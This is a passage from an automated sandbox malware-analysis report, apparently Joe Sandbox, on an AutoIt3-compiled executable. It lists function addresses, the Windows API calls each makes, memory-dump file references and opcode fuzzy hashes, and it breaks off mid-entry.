                                        • Instruction ID: 031710cc548c27b3ac1987300ef01b7f0df15b183bedde25a1f6f618b31c8581
                                        • Opcode Fuzzy Hash: 12ca662014a44dec5e472d219b05a89eac32361f7bd83ff96744d8f512300d98
                                        • Instruction Fuzzy Hash: 9FF054F1A40305BFE6105765BC05FB77A6DEB45355F404821BB04D5191D7BA5E1087B8
                                        Function 007B9C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(?), ref: 007B9C7F
                                          • Part of subcall function 007BAD14: _memset.LIBCMT ref: 007BAD49
                                        • _memmove.LIBCMT ref: 007B9CA2
                                        • _memset.LIBCMT ref: 007B9CAF
                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 007B9CBF
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                        • String ID:
                                        • API String ID: 48991266-0
                                        • Opcode ID: 643e9f0303bedf04efb6b981d9f422c3a9ca3a750d0cc33fc330bde54433aad6
                                        • Instruction ID: 6b09429d2f36291d10f69562826a17bc2b3de780fa951972b0f0adb64f8b86dc
                                        • Opcode Fuzzy Hash: 643e9f0303bedf04efb6b981d9f422c3a9ca3a750d0cc33fc330bde54433aad6
                                        • Instruction Fuzzy Hash: 56F03076201000ABCF016F54EC89A99BB29EF45320F04C051FE085E217C779E811DBF5
                                        Function 007DE83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0078B5EB
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B5FA
                                          • Part of subcall function 0078B58B: BeginPath.GDI32(?), ref: 0078B611
                                          • Part of subcall function 0078B58B: SelectObject.GDI32(?,00000000), ref: 0078B63B
                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 007DE860
                                        • LineTo.GDI32(00000000,?,?), ref: 007DE86D
                                        • EndPath.GDI32(00000000), ref: 007DE87D
                                        • StrokePath.GDI32(00000000), ref: 007DE88B
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                        • String ID:
                                        • API String ID: 1539411459-0
                                        • Opcode ID: 8de61462213437fde21a188965c2f2c1fb56c467cae9a492037330affd6ba29d
                                        • Instruction ID: a969e7da5c0b53d2e2f625658af05cc1c7a6dd434a0f8b4d095b5ac5a1647400
                                        • Opcode Fuzzy Hash: 8de61462213437fde21a188965c2f2c1fb56c467cae9a492037330affd6ba29d
                                        • Instruction Fuzzy Hash: 93F0BE31000259BADB222F50AC0DFDE3FAAAF06710F008101FA11241E1CB7D9921DFA9
                                        Function 007AD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 007AD640
                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 007AD653
                                        • GetCurrentThreadId.KERNEL32 ref: 007AD65A
                                        • AttachThreadInput.USER32(00000000), ref: 007AD661
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                        • String ID:
                                        • API String ID: 2710830443-0
                                        • Opcode ID: afa7a0783c33c6debcb11e08a8063f9d0fdaac753c48e27dd20c8233ad612035
                                        • Instruction ID: 80826b294f47df4a04e04beea9e52f7b835a7c6ea71a6558b4d7e738a7ddd03c
                                        • Opcode Fuzzy Hash: afa7a0783c33c6debcb11e08a8063f9d0fdaac753c48e27dd20c8233ad612035
                                        • Instruction Fuzzy Hash: 12E03971105228BADB301BA29C0DEEB7F2DEF567E1F008010B50DC5460CA799D80CBA4
                                        Function 0078B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSysColor.USER32(00000008), ref: 0078B0C5
                                        • SetTextColor.GDI32(?,000000FF), ref: 0078B0CF
                                        • SetBkMode.GDI32(?,00000001), ref: 0078B0E4
                                        • GetStockObject.GDI32(00000005), ref: 0078B0EC
                                        • GetWindowDC.USER32(?,00000000), ref: 007EECFA
                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 007EED07
                                        • GetPixel.GDI32(00000000,?,00000000), ref: 007EED20
                                        • GetPixel.GDI32(00000000,00000000,?), ref: 007EED39
                                        • GetPixel.GDI32(00000000,?,?), ref: 007EED59
                                        • ReleaseDC.USER32(?,00000000), ref: 007EED64
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                        • String ID:
                                        • API String ID: 1946975507-0
                                        • Opcode ID: ca0c40ad727d33393d01fb5f1cdcc5ea4c95ed60eaf06ab628fc00b6bb401028
                                        • Instruction ID: 6bf2b7890f6d055c4b8e5ab1ac0e92ccfe04b4a4214d2846eaf102b6c7d37896
                                        • Opcode Fuzzy Hash: ca0c40ad727d33393d01fb5f1cdcc5ea4c95ed60eaf06ab628fc00b6bb401028
                                        • Instruction Fuzzy Hash: 87E0ED31504284AEEB315F75AC4D7A83B22AB56336F14C266F669580E2D7794940DB11
                                        Function 007EC0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: 7020c8cd711ab408335463fa1afd1cec820013909d898f7cc19c50f7b0ecd0cb
                                        • Instruction ID: b91c3496a4c4597937102a736401a5df9de87ae41eb2dd77d79474a8abb01e2a
                                        • Opcode Fuzzy Hash: 7020c8cd711ab408335463fa1afd1cec820013909d898f7cc19c50f7b0ecd0cb
                                        • Instruction Fuzzy Hash: A6E01AB5540204EFDB106F708C4CA6D3BA6EB4C391F11C405F84AC7251DA7C9981CB04
                                        Function 007EC0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: CapsDesktopDeviceReleaseWindow
                                        • String ID:
                                        • API String ID: 2889604237-0
                                        • Opcode ID: e6ba83cebfbdebff961833bafb62d4584e1a55040e5cc56a93e3aa8876d67755
                                        • Instruction ID: e20964d1b598bcc09ad2c638822ef0178f489db16cab62ada257f7dd696939d5
                                        • Opcode Fuzzy Hash: e6ba83cebfbdebff961833bafb62d4584e1a55040e5cc56a93e3aa8876d67755
                                        • Instruction Fuzzy Hash: ACE092B5540204EFDB106F709C4C6697BAAEB483A1F11C415F94ACB251DBBD9981CB54
                                        Function 007F2350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _memmove
                                        • String ID: >$DEFINE
                                        • API String ID: 4104443479-1664449232
                                        • Opcode ID: a52b1fa2e2d3040b4006989606f6229667ce86f97aa9b25349d3e68293859d67
                                        • Instruction ID: bee68d4c52fd8e67a1e65d183041f5356a698ce7c77e5ff18f5697dd8b067b1f
                                        • Opcode Fuzzy Hash: a52b1fa2e2d3040b4006989606f6229667ce86f97aa9b25349d3e68293859d67
                                        • Instruction Fuzzy Hash: 35125C75A0020ADFCF24CF58C4906BDB7B1FF48350F25815AE959AB355E778AD82CB90
                                        Function 007AEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • OleSetContainedObject.OLE32(?,00000001), ref: 007AECA0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ContainedObject
                                        • String ID: AutoIt3GUI$Container
                                        • API String ID: 3565006973-3941886329
                                        • Opcode ID: 4958c17263333b9a9b3a51af54990b46fc19d403b351a303cfb76aa43c69fa2d
                                        • Instruction ID: c5a6afec617c65f1afe198d58db1da14deba95c34528f929a218a4020135020c
                                        • Opcode Fuzzy Hash: 4958c17263333b9a9b3a51af54990b46fc19d403b351a303cfb76aa43c69fa2d
                                        • Instruction Fuzzy Hash: 749128B4600605EFDB14DF64C888B6ABBB5FF89710F24856DE94ACB291DB74E841CB60
                                        Function 007BE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00773BCF: _wcscpy.LIBCMT ref: 00773BF2
                                          • Part of subcall function 007784A6: __swprintf.LIBCMT ref: 007784E5
                                          • Part of subcall function 007784A6: __itow.LIBCMT ref: 00778519
                                        • __wcsnicmp.LIBCMT ref: 007BE785
                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 007BE84E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                        • String ID: LPT
                                        • API String ID: 3222508074-1350329615
                                        • Opcode ID: d1ef178f5d5696614a5f55dccec21a71f20e09395f4ca038518afbf152226da4
                                        • Instruction ID: edeab046dfa4bdf29355c7102ef092bdffb418bb309723f6826a4f02b19972c8
                                        • Opcode Fuzzy Hash: d1ef178f5d5696614a5f55dccec21a71f20e09395f4ca038518afbf152226da4
                                        • Instruction Fuzzy Hash: 92615D75A00615EFCB14EF94C895EEEB7B8EF08310F148069F546AB391DB78AE80CB51
                                        Function 00771B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32(00000000), ref: 00771B83
                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00771B9C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: GlobalMemorySleepStatus
                                        • String ID: @
                                        • API String ID: 2783356886-2766056989
                                        • Opcode ID: 0969354fe8d0f2b475a2870d4994a6a007bdb095ac464abdbd2394dc3304c2dc
                                        • Instruction ID: 864922137f01da858c7a983451bd710e4d34b260a07a4c2fa3e12b5f3b9e5543
                                        • Opcode Fuzzy Hash: 0969354fe8d0f2b475a2870d4994a6a007bdb095ac464abdbd2394dc3304c2dc
                                        • Instruction Fuzzy Hash: 8B515871448744EBE320AF14D889BABBBECFF98355F81484DF1C8410A6EB75856DC762
                                        Function 007BCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077417D: __fread_nolock.LIBCMT ref: 0077419B
                                        • _wcscmp.LIBCMT ref: 007BCF49
                                        • _wcscmp.LIBCMT ref: 007BCF5C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: _wcscmp$__fread_nolock
                                        • String ID: FILE
                                        • API String ID: 4029003684-3121273764
                                        • Opcode ID: 740eb1488182eaffcebf0df3217a6a699867fb58a2a5b07b60d53562ccc60e01
                                        • Instruction ID: 21241199f8b8ddbffb6be74d6877a59257048fe5c37fbe844a7bf5775f7f8fe3
                                        • Opcode Fuzzy Hash: 740eb1488182eaffcebf0df3217a6a699867fb58a2a5b07b60d53562ccc60e01
                                        • Instruction Fuzzy Hash: BC410332A00219BEDF11EBA4CC85FEF7BBAAF49710F004469F615EB181D7799A44C750
                                        Function 00799AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0079889E: __getptd_noexit.LIBCMT ref: 0079889E
                                        • __getbuf.LIBCMT ref: 00799B8A
                                        • __lseeki64.LIBCMT ref: 00799BFA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __getbuf__getptd_noexit__lseeki64
                                        • String ID: pMz
                                        • API String ID: 3311320906-1589057576
                                        • Opcode ID: be35d8cbc8679f2fa510d4b2af9a91efd5ab9c8f50dc64bf930f960b59db3f58
                                        • Instruction ID: e74ee9814c562c42f19bf3dfbe514bd6d188d6384a01e6e5aec595d895dcf127
                                        • Opcode Fuzzy Hash: be35d8cbc8679f2fa510d4b2af9a91efd5ab9c8f50dc64bf930f960b59db3f58
                                        • Instruction Fuzzy Hash: 1A4114B1500B059EEF348B7CF855A7A77E4AF86330F14861DE6AA876D1E77CD8408B60
                                        Function 007DA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007DA668
                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007DA67D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: '
                                        • API String ID: 3850602802-1997036262
                                        • Opcode ID: 4d5d523efd104a9af95f9da84d58985bf94b0d5d5c12d9ab1dc002c5f793267a
                                        • Instruction ID: 5da671ebe5168156d31b905a6316b4e87920a5ac49f95048d4de4808e5a3df08
                                        • Opcode Fuzzy Hash: 4d5d523efd104a9af95f9da84d58985bf94b0d5d5c12d9ab1dc002c5f793267a
                                        • Instruction Fuzzy Hash: 5541F275A00209EFDF14CFA8D880BDA7BB5BB09700F14446AE919AB381D774A951CFA1
                                        Function 007D9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                        Download Yara Rule
                                        APIs
                                        • DestroyWindow.USER32(?,?,?,?), ref: 007D961B
                                        • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007D9657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$DestroyMove
                                        • String ID: static
                                        • API String ID: 2139405536-2160076837
                                        • Opcode ID: 31f7dec08d84e36b2fcfe178da50118ec1a8b89ad71e5fae66fedb52e1d37cff
                                        • Instruction ID: 4266f8c1f3a2bc5288ecc4a32bced934dfce47a046f8df175f742cbbe90bdba4
                                        • Opcode Fuzzy Hash: 31f7dec08d84e36b2fcfe178da50118ec1a8b89ad71e5fae66fedb52e1d37cff
                                        • Instruction Fuzzy Hash: BE31C131100204AEEB109F24DC84FFB77B9FF48754F10852AF9A9C7290CA39AC91D764
                                        Function 007B5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 007B5BE4
                                        • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007B5C1F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: InfoItemMenu_memset
                                        • String ID: 0
                                        • API String ID: 2223754486-4108050209
                                        • Opcode ID: b4365809a627a25345f2a073af5bcedd5f632dfe2a96a155ccbf7b495d6297b5
                                        • Instruction ID: 5c9c3260f83fc9b4746507049fe4085840aadf484bf9a8f21bac11202fc09718
